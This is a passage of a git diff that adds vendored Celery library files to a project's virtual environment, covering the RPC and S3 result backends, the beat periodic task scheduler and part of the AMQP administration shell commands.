BacklogLimitExceeded + + persistent = False + supports_autoexpire = True + supports_native_join = True + + retry_policy = { + 'max_retries': 20, + 'interval_start': 0, + 'interval_step': 1, + 'interval_max': 1, + } + + class Consumer(kombu.Consumer): + """Consumer that requires manual declaration of queues.""" + + auto_declare = False + + class Queue(kombu.Queue): + """Queue that never caches declaration.""" + + can_cache_declaration = False + + def __init__(self, app, connection=None, exchange=None, exchange_type=None, + persistent=None, serializer=None, auto_delete=True, **kwargs): + super().__init__(app, **kwargs) + conf = self.app.conf + self._connection = connection + self._out_of_band = {} + self.persistent = self.prepare_persistent(persistent) + self.delivery_mode = 2 if self.persistent else 1 + exchange = exchange or conf.result_exchange + exchange_type = exchange_type or conf.result_exchange_type + self.exchange = self._create_exchange( + exchange, exchange_type, self.delivery_mode, + ) + self.serializer = serializer or conf.result_serializer + self.auto_delete = auto_delete + self.result_consumer = self.ResultConsumer( + self, self.app, self.accept, + self._pending_results, self._pending_messages, + ) + if register_after_fork is not None: + register_after_fork(self, _on_after_fork_cleanup_backend) + + def _after_fork(self): + # clear state for child processes. + self._pending_results.clear() + self.result_consumer._after_fork() + + def _create_exchange(self, name, type='direct', delivery_mode=2): + # uses direct to queue routing (anon exchange). 
+ return self.Exchange(None) + + def _create_binding(self, task_id): + """Create new binding for task with id.""" + # RPC backend caches the binding, as one queue is used for all tasks. + return self.binding + + def ensure_chords_allowed(self): + raise NotImplementedError(E_NO_CHORD_SUPPORT.strip()) + + def on_task_call(self, producer, task_id): + # Called every time a task is sent when using this backend. + # We declare the queue we receive replies on in advance of sending + # the message, but we skip this if running in the prefork pool + # (task_join_will_block), as we know the queue is already declared. + if not task_join_will_block(): + maybe_declare(self.binding(producer.channel), retry=True) + + def destination_for(self, task_id, request): + """Get the destination for result by task id. + + Returns: + Tuple[str, str]: tuple of ``(reply_to, correlation_id)``. + """ + # Backends didn't always receive the `request`, so we must still + # support old code that relies on current_task. + try: + request = request or current_task.request + except AttributeError: + raise RuntimeError( + f'RPC backend missing task request for {task_id!r}') + return request.reply_to, request.correlation_id or task_id + + def on_reply_declare(self, task_id): + # Return value here is used as the `declare=` argument + # for Producer.publish. + # By default we don't have to declare anything when sending a result. + pass + + def on_result_fulfilled(self, result): + # This usually cancels the queue after the result is received, + # but we don't have to cancel since we have one queue per process. + pass + + def as_uri(self, include_password=True): + return 'rpc://' + + def store_result(self, task_id, result, state, + traceback=None, request=None, **kwargs): + """Send task return value and state.""" + routing_key, correlation_id = self.destination_for(task_id, request) + if not routing_key: + return + with self.app.amqp.producer_pool.acquire(block=True) as producer: + producer.publish( + self._to_result(task_id, state, result, traceback, request), + exchange=self.exchange, + routing_key=routing_key, + correlation_id=correlation_id, + serializer=self.serializer, + retry=True, retry_policy=self.retry_policy, + declare=self.on_reply_declare(task_id), + delivery_mode=self.delivery_mode, + ) + return result + + def _to_result(self, task_id, state, result, traceback, request): + return { + 'task_id': task_id, + 'status': state, + 'result': self.encode_result(result, state), + 'traceback': traceback, + 'children': self.current_task_children(request), + } + + def on_out_of_band_result(self, task_id, message): + # Callback called when a reply for a task is received, + # but we have no idea what do do with it. + # Since the result is not pending, we put it in a separate + # buffer: probably it will become pending later. + if self.result_consumer: + self.result_consumer.on_out_of_band_result(message) + self._out_of_band[task_id] = message + + def get_task_meta(self, task_id, backlog_limit=1000): + buffered = self._out_of_band.pop(task_id, None) + if buffered: + return self._set_cache_by_message(task_id, buffered) + + # Polling and using basic_get + latest_by_id = {} + prev = None + for acc in self._slurp_from_queue(task_id, self.accept, backlog_limit): + tid = self._get_message_task_id(acc) + prev, latest_by_id[tid] = latest_by_id.get(tid), acc + if prev: + # backends aren't expected to keep history, + # so we delete everything except the most recent state. 
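+                    # ack() removes the superseded state message from the queue.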
+ prev.ack() + prev = None + + latest = latest_by_id.pop(task_id, None) + for tid, msg in latest_by_id.items(): + self.on_out_of_band_result(tid, msg) + + if latest: + latest.requeue() + return self._set_cache_by_message(task_id, latest) + else: + # no new state, use previous + try: + return self._cache[task_id] + except KeyError: + # result probably pending. + return {'status': states.PENDING, 'result': None} + poll = get_task_meta # XXX compat + + def _set_cache_by_message(self, task_id, message): + payload = self._cache[task_id] = self.meta_from_decoded( + message.payload) + return payload + + def _slurp_from_queue(self, task_id, accept, + limit=1000, no_ack=False): + with self.app.pool.acquire_channel(block=True) as (_, channel): + binding = self._create_binding(task_id)(channel) + binding.declare() + + for _ in range(limit): + msg = binding.get(accept=accept, no_ack=no_ack) + if not msg: + break + yield msg + else: + raise self.BacklogLimitExceeded(task_id) + + def _get_message_task_id(self, message): + try: + # try property first so we don't have to deserialize + # the payload. + return message.properties['correlation_id'] + except (AttributeError, KeyError): + # message sent by old Celery version, need to deserialize. + return message.payload['task_id'] + + def revive(self, channel): + pass + + def reload_task_result(self, task_id): + raise NotImplementedError( + 'reload_task_result is not supported by this backend.') + + def reload_group_result(self, task_id): + """Reload group result, even if it has been previously fetched.""" + raise NotImplementedError( + 'reload_group_result is not supported by this backend.') + + def save_group(self, group_id, result): + raise NotImplementedError( + 'save_group is not supported by this backend.') + + def restore_group(self, group_id, cache=True): + raise NotImplementedError( + 'restore_group is not supported by this backend.') + + def delete_group(self, group_id): + raise NotImplementedError( + 'delete_group is not supported by this backend.') + + def __reduce__(self, args=(), kwargs=None): + kwargs = {} if not kwargs else kwargs + return super().__reduce__(args, dict( + kwargs, + connection=self._connection, + exchange=self.exchange.name, + exchange_type=self.exchange.type, + persistent=self.persistent, + serializer=self.serializer, + auto_delete=self.auto_delete, + expires=self.expires, + )) + + @property + def binding(self): + return self.Queue( + self.oid, self.exchange, self.oid, + durable=False, + auto_delete=True, + expires=self.expires, + ) + + @cached_property + def oid(self): + # cached here is the app thread OID: name of queue we receive results on. + return self.app.thread_oid diff --git a/env/Lib/site-packages/celery/backends/s3.py b/env/Lib/site-packages/celery/backends/s3.py new file mode 100644 index 00000000..ea04ae37 --- /dev/null +++ b/env/Lib/site-packages/celery/backends/s3.py @@ -0,0 +1,87 @@ +"""s3 result store backend.""" + +from kombu.utils.encoding import bytes_to_str + +from celery.exceptions import ImproperlyConfigured + +from .base import KeyValueStoreBackend + +try: + import boto3 + import botocore +except ImportError: + boto3 = None + botocore = None + + +__all__ = ('S3Backend',) + + +class S3Backend(KeyValueStoreBackend): + """An S3 task result store. + + Raises: + celery.exceptions.ImproperlyConfigured: + if module :pypi:`boto3` is not available, + if the :setting:`aws_access_key_id` or + setting:`aws_secret_access_key` are not set, + or it the :setting:`bucket` is not set. 
+ """ + + def __init__(self, **kwargs): + super().__init__(**kwargs) + + if not boto3 or not botocore: + raise ImproperlyConfigured('You must install boto3' + 'to use s3 backend') + conf = self.app.conf + + self.endpoint_url = conf.get('s3_endpoint_url', None) + self.aws_region = conf.get('s3_region', None) + + self.aws_access_key_id = conf.get('s3_access_key_id', None) + self.aws_secret_access_key = conf.get('s3_secret_access_key', None) + + self.bucket_name = conf.get('s3_bucket', None) + if not self.bucket_name: + raise ImproperlyConfigured('Missing bucket name') + + self.base_path = conf.get('s3_base_path', None) + + self._s3_resource = self._connect_to_s3() + + def _get_s3_object(self, key): + key_bucket_path = self.base_path + key if self.base_path else key + return self._s3_resource.Object(self.bucket_name, key_bucket_path) + + def get(self, key): + key = bytes_to_str(key) + s3_object = self._get_s3_object(key) + try: + s3_object.load() + data = s3_object.get()['Body'].read() + return data if self.content_encoding == 'binary' else data.decode('utf-8') + except botocore.exceptions.ClientError as error: + if error.response['Error']['Code'] == "404": + return None + raise error + + def set(self, key, value): + key = bytes_to_str(key) + s3_object = self._get_s3_object(key) + s3_object.put(Body=value) + + def delete(self, key): + key = bytes_to_str(key) + s3_object = self._get_s3_object(key) + s3_object.delete() + + def _connect_to_s3(self): + session = boto3.Session( + aws_access_key_id=self.aws_access_key_id, + aws_secret_access_key=self.aws_secret_access_key, + region_name=self.aws_region + ) + if session.get_credentials() is None: + raise ImproperlyConfigured('Missing aws s3 creds') + return session.resource('s3', endpoint_url=self.endpoint_url) diff --git a/env/Lib/site-packages/celery/beat.py b/env/Lib/site-packages/celery/beat.py new file mode 100644 index 00000000..76e44721 --- /dev/null +++ b/env/Lib/site-packages/celery/beat.py @@ -0,0 +1,736 @@ +"""The periodic task scheduler.""" + +import copy +import errno +import heapq +import os +import shelve +import sys +import time +import traceback +from calendar import timegm +from collections import namedtuple +from functools import total_ordering +from threading import Event, Thread + +from billiard import ensure_multiprocessing +from billiard.common import reset_signals +from billiard.context import Process +from kombu.utils.functional import maybe_evaluate, reprcall +from kombu.utils.objects import cached_property + +from . import __version__, platforms, signals +from .exceptions import reraise +from .schedules import crontab, maybe_schedule +from .utils.functional import is_numeric_value +from .utils.imports import load_extension_class_names, symbol_by_name +from .utils.log import get_logger, iter_open_logger_fds +from .utils.time import humanize_seconds, maybe_make_aware + +__all__ = ( + 'SchedulingError', 'ScheduleEntry', 'Scheduler', + 'PersistentScheduler', 'Service', 'EmbeddedService', +) + +event_t = namedtuple('event_t', ('time', 'priority', 'entry')) + +logger = get_logger(__name__) +debug, info, error, warning = (logger.debug, logger.info, + logger.error, logger.warning) + +DEFAULT_MAX_INTERVAL = 300 # 5 minutes + + +class SchedulingError(Exception): + """An error occurred while scheduling a task.""" + + +class BeatLazyFunc: + """A lazy function declared in 'beat_schedule' and called before sending to worker. 
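+    The wrapped callable is only invoked when beat actually sends the task,
+    so values such as timestamps are computed at dispatch time.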
+ + Example: + + beat_schedule = { + 'test-every-5-minutes': { + 'task': 'test', + 'schedule': 300, + 'kwargs': { + "current": BeatCallBack(datetime.datetime.now) + } + } + } + + """ + + def __init__(self, func, *args, **kwargs): + self._func = func + self._func_params = { + "args": args, + "kwargs": kwargs + } + + def __call__(self): + return self.delay() + + def delay(self): + return self._func(*self._func_params["args"], **self._func_params["kwargs"]) + + +@total_ordering +class ScheduleEntry: + """An entry in the scheduler. + + Arguments: + name (str): see :attr:`name`. + schedule (~celery.schedules.schedule): see :attr:`schedule`. + args (Tuple): see :attr:`args`. + kwargs (Dict): see :attr:`kwargs`. + options (Dict): see :attr:`options`. + last_run_at (~datetime.datetime): see :attr:`last_run_at`. + total_run_count (int): see :attr:`total_run_count`. + relative (bool): Is the time relative to when the server starts? + """ + + #: The task name + name = None + + #: The schedule (:class:`~celery.schedules.schedule`) + schedule = None + + #: Positional arguments to apply. + args = None + + #: Keyword arguments to apply. + kwargs = None + + #: Task execution options. + options = None + + #: The time and date of when this task was last scheduled. + last_run_at = None + + #: Total number of times this task has been scheduled. + total_run_count = 0 + + def __init__(self, name=None, task=None, last_run_at=None, + total_run_count=None, schedule=None, args=(), kwargs=None, + options=None, relative=False, app=None): + self.app = app + self.name = name + self.task = task + self.args = args + self.kwargs = kwargs if kwargs else {} + self.options = options if options else {} + self.schedule = maybe_schedule(schedule, relative, app=self.app) + self.last_run_at = last_run_at or self.default_now() + self.total_run_count = total_run_count or 0 + + def default_now(self): + return self.schedule.now() if self.schedule else self.app.now() + _default_now = default_now # compat + + def _next_instance(self, last_run_at=None): + """Return new instance, with date and count fields updated.""" + return self.__class__(**dict( + self, + last_run_at=last_run_at or self.default_now(), + total_run_count=self.total_run_count + 1, + )) + __next__ = next = _next_instance # for 2to3 + + def __reduce__(self): + return self.__class__, ( + self.name, self.task, self.last_run_at, self.total_run_count, + self.schedule, self.args, self.kwargs, self.options, + ) + + def update(self, other): + """Update values from another entry. + + Will only update "editable" fields: + ``task``, ``schedule``, ``args``, ``kwargs``, ``options``. + """ + self.__dict__.update({ + 'task': other.task, 'schedule': other.schedule, + 'args': other.args, 'kwargs': other.kwargs, + 'options': other.options, + }) + + def is_due(self): + """See :meth:`~celery.schedules.schedule.is_due`.""" + return self.schedule.is_due(self.last_run_at) + + def __iter__(self): + return iter(vars(self).items()) + + def __repr__(self): + return '<{name}: {0.name} {call} {0.schedule}'.format( + self, + call=reprcall(self.task, self.args or (), self.kwargs or {}), + name=type(self).__name__, + ) + + def __lt__(self, other): + if isinstance(other, ScheduleEntry): + # How the object is ordered doesn't really matter, as + # in the scheduler heap, the order is decided by the + # preceding members of the tuple ``(time, priority, entry)``. + # + # If all that's left to order on is the entry then it can + # just as well be random. 
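+            # Comparing by id() yields an arbitrary but consistent ordering.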
+ return id(self) < id(other) + return NotImplemented + + def editable_fields_equal(self, other): + for attr in ('task', 'args', 'kwargs', 'options', 'schedule'): + if getattr(self, attr) != getattr(other, attr): + return False + return True + + def __eq__(self, other): + """Test schedule entries equality. + + Will only compare "editable" fields: + ``task``, ``schedule``, ``args``, ``kwargs``, ``options``. + """ + return self.editable_fields_equal(other) + + +def _evaluate_entry_args(entry_args): + if not entry_args: + return [] + return [ + v() if isinstance(v, BeatLazyFunc) else v + for v in entry_args + ] + + +def _evaluate_entry_kwargs(entry_kwargs): + if not entry_kwargs: + return {} + return { + k: v() if isinstance(v, BeatLazyFunc) else v + for k, v in entry_kwargs.items() + } + + +class Scheduler: + """Scheduler for periodic tasks. + + The :program:`celery beat` program may instantiate this class + multiple times for introspection purposes, but then with the + ``lazy`` argument set. It's important for subclasses to + be idempotent when this argument is set. + + Arguments: + schedule (~celery.schedules.schedule): see :attr:`schedule`. + max_interval (int): see :attr:`max_interval`. + lazy (bool): Don't set up the schedule. + """ + + Entry = ScheduleEntry + + #: The schedule dict/shelve. + schedule = None + + #: Maximum time to sleep between re-checking the schedule. + max_interval = DEFAULT_MAX_INTERVAL + + #: How often to sync the schedule (3 minutes by default) + sync_every = 3 * 60 + + #: How many tasks can be called before a sync is forced. + sync_every_tasks = None + + _last_sync = None + _tasks_since_sync = 0 + + logger = logger # compat + + def __init__(self, app, schedule=None, max_interval=None, + Producer=None, lazy=False, sync_every_tasks=None, **kwargs): + self.app = app + self.data = maybe_evaluate({} if schedule is None else schedule) + self.max_interval = (max_interval or + app.conf.beat_max_loop_interval or + self.max_interval) + self.Producer = Producer or app.amqp.Producer + self._heap = None + self.old_schedulers = None + self.sync_every_tasks = ( + app.conf.beat_sync_every if sync_every_tasks is None + else sync_every_tasks) + if not lazy: + self.setup_schedule() + + def install_default_entries(self, data): + entries = {} + if self.app.conf.result_expires and \ + not self.app.backend.supports_autoexpire: + if 'celery.backend_cleanup' not in data: + entries['celery.backend_cleanup'] = { + 'task': 'celery.backend_cleanup', + 'schedule': crontab('0', '4', '*'), + 'options': {'expires': 12 * 3600}} + self.update_from_dict(entries) + + def apply_entry(self, entry, producer=None): + info('Scheduler: Sending due task %s (%s)', entry.name, entry.task) + try: + result = self.apply_async(entry, producer=producer, advance=False) + except Exception as exc: # pylint: disable=broad-except + error('Message Error: %s\n%s', + exc, traceback.format_stack(), exc_info=True) + else: + if result and hasattr(result, 'id'): + debug('%s sent. 
id->%s', entry.task, result.id) + else: + debug('%s sent.', entry.task) + + def adjust(self, n, drift=-0.010): + if n and n > 0: + return n + drift + return n + + def is_due(self, entry): + return entry.is_due() + + def _when(self, entry, next_time_to_run, mktime=timegm): + """Return a utc timestamp, make sure heapq in correct order.""" + adjust = self.adjust + + as_now = maybe_make_aware(entry.default_now()) + + return (mktime(as_now.utctimetuple()) + + as_now.microsecond / 1e6 + + (adjust(next_time_to_run) or 0)) + + def populate_heap(self, event_t=event_t, heapify=heapq.heapify): + """Populate the heap with the data contained in the schedule.""" + priority = 5 + self._heap = [] + for entry in self.schedule.values(): + is_due, next_call_delay = entry.is_due() + self._heap.append(event_t( + self._when( + entry, + 0 if is_due else next_call_delay + ) or 0, + priority, entry + )) + heapify(self._heap) + + # pylint disable=redefined-outer-name + def tick(self, event_t=event_t, min=min, heappop=heapq.heappop, + heappush=heapq.heappush): + """Run a tick - one iteration of the scheduler. + + Executes one due task per call. + + Returns: + float: preferred delay in seconds for next call. + """ + adjust = self.adjust + max_interval = self.max_interval + + if (self._heap is None or + not self.schedules_equal(self.old_schedulers, self.schedule)): + self.old_schedulers = copy.copy(self.schedule) + self.populate_heap() + + H = self._heap + + if not H: + return max_interval + + event = H[0] + entry = event[2] + is_due, next_time_to_run = self.is_due(entry) + if is_due: + verify = heappop(H) + if verify is event: + next_entry = self.reserve(entry) + self.apply_entry(entry, producer=self.producer) + heappush(H, event_t(self._when(next_entry, next_time_to_run), + event[1], next_entry)) + return 0 + else: + heappush(H, verify) + return min(verify[0], max_interval) + adjusted_next_time_to_run = adjust(next_time_to_run) + return min(adjusted_next_time_to_run if is_numeric_value(adjusted_next_time_to_run) else max_interval, + max_interval) + + def schedules_equal(self, old_schedules, new_schedules): + if old_schedules is new_schedules is None: + return True + if old_schedules is None or new_schedules is None: + return False + if set(old_schedules.keys()) != set(new_schedules.keys()): + return False + for name, old_entry in old_schedules.items(): + new_entry = new_schedules.get(name) + if not new_entry: + return False + if new_entry != old_entry: + return False + return True + + def should_sync(self): + return ( + (not self._last_sync or + (time.monotonic() - self._last_sync) > self.sync_every) or + (self.sync_every_tasks and + self._tasks_since_sync >= self.sync_every_tasks) + ) + + def reserve(self, entry): + new_entry = self.schedule[entry.name] = next(entry) + return new_entry + + def apply_async(self, entry, producer=None, advance=True, **kwargs): + # Update time-stamps and run counts before we actually execute, + # so we have that done if an exception is raised (doesn't schedule + # forever.) 
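+        # reserve() stores the next entry instance in the schedule, with an
+        # updated last_run_at and an incremented total_run_count.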
+ entry = self.reserve(entry) if advance else entry + task = self.app.tasks.get(entry.task) + + try: + entry_args = _evaluate_entry_args(entry.args) + entry_kwargs = _evaluate_entry_kwargs(entry.kwargs) + if task: + return task.apply_async(entry_args, entry_kwargs, + producer=producer, + **entry.options) + else: + return self.send_task(entry.task, entry_args, entry_kwargs, + producer=producer, + **entry.options) + except Exception as exc: # pylint: disable=broad-except + reraise(SchedulingError, SchedulingError( + "Couldn't apply scheduled task {0.name}: {exc}".format( + entry, exc=exc)), sys.exc_info()[2]) + finally: + self._tasks_since_sync += 1 + if self.should_sync(): + self._do_sync() + + def send_task(self, *args, **kwargs): + return self.app.send_task(*args, **kwargs) + + def setup_schedule(self): + self.install_default_entries(self.data) + self.merge_inplace(self.app.conf.beat_schedule) + + def _do_sync(self): + try: + debug('beat: Synchronizing schedule...') + self.sync() + finally: + self._last_sync = time.monotonic() + self._tasks_since_sync = 0 + + def sync(self): + pass + + def close(self): + self.sync() + + def add(self, **kwargs): + entry = self.Entry(app=self.app, **kwargs) + self.schedule[entry.name] = entry + return entry + + def _maybe_entry(self, name, entry): + if isinstance(entry, self.Entry): + entry.app = self.app + return entry + return self.Entry(**dict(entry, name=name, app=self.app)) + + def update_from_dict(self, dict_): + self.schedule.update({ + name: self._maybe_entry(name, entry) + for name, entry in dict_.items() + }) + + def merge_inplace(self, b): + schedule = self.schedule + A, B = set(schedule), set(b) + + # Remove items from disk not in the schedule anymore. + for key in A ^ B: + schedule.pop(key, None) + + # Update and add new items in the schedule + for key in B: + entry = self.Entry(**dict(b[key], name=key, app=self.app)) + if schedule.get(key): + schedule[key].update(entry) + else: + schedule[key] = entry + + def _ensure_connected(self): + # callback called for each retry while the connection + # can't be established. + def _error_handler(exc, interval): + error('beat: Connection error: %s. 
' + 'Trying again in %s seconds...', exc, interval) + + return self.connection.ensure_connection( + _error_handler, self.app.conf.broker_connection_max_retries + ) + + def get_schedule(self): + return self.data + + def set_schedule(self, schedule): + self.data = schedule + schedule = property(get_schedule, set_schedule) + + @cached_property + def connection(self): + return self.app.connection_for_write() + + @cached_property + def producer(self): + return self.Producer(self._ensure_connected(), auto_declare=False) + + @property + def info(self): + return '' + + +class PersistentScheduler(Scheduler): + """Scheduler backed by :mod:`shelve` database.""" + + persistence = shelve + known_suffixes = ('', '.db', '.dat', '.bak', '.dir') + + _store = None + + def __init__(self, *args, **kwargs): + self.schedule_filename = kwargs.get('schedule_filename') + super().__init__(*args, **kwargs) + + def _remove_db(self): + for suffix in self.known_suffixes: + with platforms.ignore_errno(errno.ENOENT): + os.remove(self.schedule_filename + suffix) + + def _open_schedule(self): + return self.persistence.open(self.schedule_filename, writeback=True) + + def _destroy_open_corrupted_schedule(self, exc): + error('Removing corrupted schedule file %r: %r', + self.schedule_filename, exc, exc_info=True) + self._remove_db() + return self._open_schedule() + + def setup_schedule(self): + try: + self._store = self._open_schedule() + # In some cases there may be different errors from a storage + # backend for corrupted files. Example - DBPageNotFoundError + # exception from bsddb. In such case the file will be + # successfully opened but the error will be raised on first key + # retrieving. + self._store.keys() + except Exception as exc: # pylint: disable=broad-except + self._store = self._destroy_open_corrupted_schedule(exc) + + self._create_schedule() + + tz = self.app.conf.timezone + stored_tz = self._store.get('tz') + if stored_tz is not None and stored_tz != tz: + warning('Reset: Timezone changed from %r to %r', stored_tz, tz) + self._store.clear() # Timezone changed, reset db! + utc = self.app.conf.enable_utc + stored_utc = self._store.get('utc_enabled') + if stored_utc is not None and stored_utc != utc: + choices = {True: 'enabled', False: 'disabled'} + warning('Reset: UTC changed from %s to %s', + choices[stored_utc], choices[utc]) + self._store.clear() # UTC setting changed, reset db! + entries = self._store.setdefault('entries', {}) + self.merge_inplace(self.app.conf.beat_schedule) + self.install_default_entries(self.schedule) + self._store.update({ + '__version__': __version__, + 'tz': tz, + 'utc_enabled': utc, + }) + self.sync() + debug('Current schedule:\n' + '\n'.join( + repr(entry) for entry in entries.values())) + + def _create_schedule(self): + for _ in (1, 2): + try: + self._store['entries'] + except KeyError: + # new schedule db + try: + self._store['entries'] = {} + except KeyError as exc: + self._store = self._destroy_open_corrupted_schedule(exc) + continue + else: + if '__version__' not in self._store: + warning('DB Reset: Account for new __version__ field') + self._store.clear() # remove schedule at 2.2.2 upgrade. 
+ elif 'tz' not in self._store: + warning('DB Reset: Account for new tz field') + self._store.clear() # remove schedule at 3.0.8 upgrade + elif 'utc_enabled' not in self._store: + warning('DB Reset: Account for new utc_enabled field') + self._store.clear() # remove schedule at 3.0.9 upgrade + break + + def get_schedule(self): + return self._store['entries'] + + def set_schedule(self, schedule): + self._store['entries'] = schedule + schedule = property(get_schedule, set_schedule) + + def sync(self): + if self._store is not None: + self._store.sync() + + def close(self): + self.sync() + self._store.close() + + @property + def info(self): + return f' . db -> {self.schedule_filename}' + + +class Service: + """Celery periodic task service.""" + + scheduler_cls = PersistentScheduler + + def __init__(self, app, max_interval=None, schedule_filename=None, + scheduler_cls=None): + self.app = app + self.max_interval = (max_interval or + app.conf.beat_max_loop_interval) + self.scheduler_cls = scheduler_cls or self.scheduler_cls + self.schedule_filename = ( + schedule_filename or app.conf.beat_schedule_filename) + + self._is_shutdown = Event() + self._is_stopped = Event() + + def __reduce__(self): + return self.__class__, (self.max_interval, self.schedule_filename, + self.scheduler_cls, self.app) + + def start(self, embedded_process=False): + info('beat: Starting...') + debug('beat: Ticking with max interval->%s', + humanize_seconds(self.scheduler.max_interval)) + + signals.beat_init.send(sender=self) + if embedded_process: + signals.beat_embedded_init.send(sender=self) + platforms.set_process_title('celery beat') + + try: + while not self._is_shutdown.is_set(): + interval = self.scheduler.tick() + if interval and interval > 0.0: + debug('beat: Waking up %s.', + humanize_seconds(interval, prefix='in ')) + time.sleep(interval) + if self.scheduler.should_sync(): + self.scheduler._do_sync() + except (KeyboardInterrupt, SystemExit): + self._is_shutdown.set() + finally: + self.sync() + + def sync(self): + self.scheduler.close() + self._is_stopped.set() + + def stop(self, wait=False): + info('beat: Shutting down...') + self._is_shutdown.set() + wait and self._is_stopped.wait() # block until shutdown done. 
+ + def get_scheduler(self, lazy=False, + extension_namespace='celery.beat_schedulers'): + filename = self.schedule_filename + aliases = dict(load_extension_class_names(extension_namespace)) + return symbol_by_name(self.scheduler_cls, aliases=aliases)( + app=self.app, + schedule_filename=filename, + max_interval=self.max_interval, + lazy=lazy, + ) + + @cached_property + def scheduler(self): + return self.get_scheduler() + + +class _Threaded(Thread): + """Embedded task scheduler using threading.""" + + def __init__(self, app, **kwargs): + super().__init__() + self.app = app + self.service = Service(app, **kwargs) + self.daemon = True + self.name = 'Beat' + + def run(self): + self.app.set_current() + self.service.start() + + def stop(self): + self.service.stop(wait=True) + + +try: + ensure_multiprocessing() +except NotImplementedError: # pragma: no cover + _Process = None +else: + class _Process(Process): + + def __init__(self, app, **kwargs): + super().__init__() + self.app = app + self.service = Service(app, **kwargs) + self.name = 'Beat' + + def run(self): + reset_signals(full=False) + platforms.close_open_fds([ + sys.__stdin__, sys.__stdout__, sys.__stderr__, + ] + list(iter_open_logger_fds())) + self.app.set_default() + self.app.set_current() + self.service.start(embedded_process=True) + + def stop(self): + self.service.stop() + self.terminate() + + +def EmbeddedService(app, max_interval=None, **kwargs): + """Return embedded clock service. + + Arguments: + thread (bool): Run threaded instead of as a separate process. + Uses :mod:`multiprocessing` by default, if available. + """ + if kwargs.pop('thread', False) or _Process is None: + # Need short max interval to be able to stop thread + # in reasonable time. + return _Threaded(app, max_interval=1, **kwargs) + return _Process(app, max_interval=max_interval, **kwargs) diff --git a/env/Lib/site-packages/celery/bin/__init__.py b/env/Lib/site-packages/celery/bin/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/env/Lib/site-packages/celery/bin/amqp.py b/env/Lib/site-packages/celery/bin/amqp.py new file mode 100644 index 00000000..b42b1dae --- /dev/null +++ b/env/Lib/site-packages/celery/bin/amqp.py @@ -0,0 +1,312 @@ +"""AMQP 0.9.1 REPL.""" + +import pprint + +import click +from amqp import Connection, Message +from click_repl import register_repl + +__all__ = ('amqp',) + +from celery.bin.base import handle_preload_options + + +def dump_message(message): + if message is None: + return 'No messages in queue. basic.publish something.' 
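+    # Expose only the parts of the message that are useful to display.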
+ return {'body': message.body, + 'properties': message.properties, + 'delivery_info': message.delivery_info} + + +class AMQPContext: + def __init__(self, cli_context): + self.cli_context = cli_context + self.connection = self.cli_context.app.connection() + self.channel = None + self.reconnect() + + @property + def app(self): + return self.cli_context.app + + def respond(self, retval): + if isinstance(retval, str): + self.cli_context.echo(retval) + else: + self.cli_context.echo(pprint.pformat(retval)) + + def echo_error(self, exception): + self.cli_context.error(f'{self.cli_context.ERROR}: {exception}') + + def echo_ok(self): + self.cli_context.echo(self.cli_context.OK) + + def reconnect(self): + if self.connection: + self.connection.close() + else: + self.connection = self.cli_context.app.connection() + + self.cli_context.echo(f'-> connecting to {self.connection.as_uri()}.') + try: + self.connection.connect() + except (ConnectionRefusedError, ConnectionResetError) as e: + self.echo_error(e) + else: + self.cli_context.secho('-> connected.', fg='green', bold=True) + self.channel = self.connection.default_channel + + +@click.group(invoke_without_command=True) +@click.pass_context +@handle_preload_options +def amqp(ctx): + """AMQP Administration Shell. + + Also works for non-AMQP transports (but not ones that + store declarations in memory). + """ + if not isinstance(ctx.obj, AMQPContext): + ctx.obj = AMQPContext(ctx.obj) + + +@amqp.command(name='exchange.declare') +@click.argument('exchange', + type=str) +@click.argument('type', + type=str) +@click.argument('passive', + type=bool, + default=False) +@click.argument('durable', + type=bool, + default=False) +@click.argument('auto_delete', + type=bool, + default=False) +@click.pass_obj +def exchange_declare(amqp_context, exchange, type, passive, durable, + auto_delete): + if amqp_context.channel is None: + amqp_context.echo_error('Not connected to broker. Please retry...') + amqp_context.reconnect() + else: + try: + amqp_context.channel.exchange_declare(exchange=exchange, + type=type, + passive=passive, + durable=durable, + auto_delete=auto_delete) + except Exception as e: + amqp_context.echo_error(e) + amqp_context.reconnect() + else: + amqp_context.echo_ok() + + +@amqp.command(name='exchange.delete') +@click.argument('exchange', + type=str) +@click.argument('if_unused', + type=bool) +@click.pass_obj +def exchange_delete(amqp_context, exchange, if_unused): + if amqp_context.channel is None: + amqp_context.echo_error('Not connected to broker. Please retry...') + amqp_context.reconnect() + else: + try: + amqp_context.channel.exchange_delete(exchange=exchange, + if_unused=if_unused) + except Exception as e: + amqp_context.echo_error(e) + amqp_context.reconnect() + else: + amqp_context.echo_ok() + + +@amqp.command(name='queue.bind') +@click.argument('queue', + type=str) +@click.argument('exchange', + type=str) +@click.argument('routing_key', + type=str) +@click.pass_obj +def queue_bind(amqp_context, queue, exchange, routing_key): + if amqp_context.channel is None: + amqp_context.echo_error('Not connected to broker. 
Please retry...') + amqp_context.reconnect() + else: + try: + amqp_context.channel.queue_bind(queue=queue, + exchange=exchange, + routing_key=routing_key) + except Exception as e: + amqp_context.echo_error(e) + amqp_context.reconnect() + else: + amqp_context.echo_ok() + + +@amqp.command(name='queue.declare') +@click.argument('queue', + type=str) +@click.argument('passive', + type=bool, + default=False) +@click.argument('durable', + type=bool, + default=False) +@click.argument('auto_delete', + type=bool, + default=False) +@click.pass_obj +def queue_declare(amqp_context, queue, passive, durable, auto_delete): + if amqp_context.channel is None: + amqp_context.echo_error('Not connected to broker. Please retry...') + amqp_context.reconnect() + else: + try: + retval = amqp_context.channel.queue_declare(queue=queue, + passive=passive, + durable=durable, + auto_delete=auto_delete) + except Exception as e: + amqp_context.echo_error(e) + amqp_context.reconnect() + else: + amqp_context.cli_context.secho( + 'queue:{} messages:{} consumers:{}'.format(*retval), + fg='cyan', bold=True) + amqp_context.echo_ok() + + +@amqp.command(name='queue.delete') +@click.argument('queue', + type=str) +@click.argument('if_unused', + type=bool, + default=False) +@click.argument('if_empty', + type=bool, + default=False) +@click.pass_obj +def queue_delete(amqp_context, queue, if_unused, if_empty): + if amqp_context.channel is None: + amqp_context.echo_error('Not connected to broker. Please retry...') + amqp_context.reconnect() + else: + try: + retval = amqp_context.channel.queue_delete(queue=queue, + if_unused=if_unused, + if_empty=if_empty) + except Exception as e: + amqp_context.echo_error(e) + amqp_context.reconnect() + else: + amqp_context.cli_context.secho( + f'{retval} messages deleted.', + fg='cyan', bold=True) + amqp_context.echo_ok() + + +@amqp.command(name='queue.purge') +@click.argument('queue', + type=str) +@click.pass_obj +def queue_purge(amqp_context, queue): + if amqp_context.channel is None: + amqp_context.echo_error('Not connected to broker. Please retry...') + amqp_context.reconnect() + else: + try: + retval = 